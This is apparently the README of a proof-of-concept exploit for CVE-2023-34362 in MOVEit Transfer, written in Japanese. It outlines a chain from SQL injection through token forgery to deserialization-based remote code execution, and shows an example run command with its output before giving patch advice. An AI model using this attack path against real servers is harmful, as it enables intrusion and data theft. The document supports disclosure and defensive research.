
MOVEit Transfer に影響する CVE-2023-34362 の PoC
MOVEit Transfer に影響する CVE-2023-34362 の POC
この脆弱性の根本原因に関する技術的分析は、ブログで公開されています:
この POC は SQL インジェクションを悪用して sysadmin API アクセストークンを取得し、そのアクセスを利用して逆シリアル化呼び出しを悪用し、リモートコード実行を獲得します。
この POC は、任意のユーザートークンを偽造するために使用される適切な RS256 証明書をホストする Identity Provider エンドポイントにアクセスする必要があります。デフォルトでは、この POC は AWS でホストされている当社の IDP エンドポイントを使用します。
このエクスプロイトは、デフォルトで C:\Windows\Temp\message.txt にファイルを書き込みます。代替ペイロードは、ysoserial.net プロジェクトを使用して生成できます。
python CVE-2023-34362.py https://127.0.0.1
[*] Getting sysadmin access token
[*] Got access token
[*] Getting FolderID
[*] Got FolderID: 963611079
[*] Starting file upload
[*] Got FileID: 965943963
[*] Injecting the payload
[*] Payload injected
[*] Triggering payload via resume call
[+] Triggered the payload!
[*] Deleting uploaded file
最新バージョンに更新するか、Progress Advisory の指示に従って緩和してください。
このソフトウェアは、学術研究および効果的な防御技術の開発を目的としてのみ作成されており、明示的に許可された場合を除き、システムへの攻撃に使用することを意図したものではありません。プロジェクトのメンテナは、ソフトウェアの誤用について責任を負いません。責任を持って使用してください。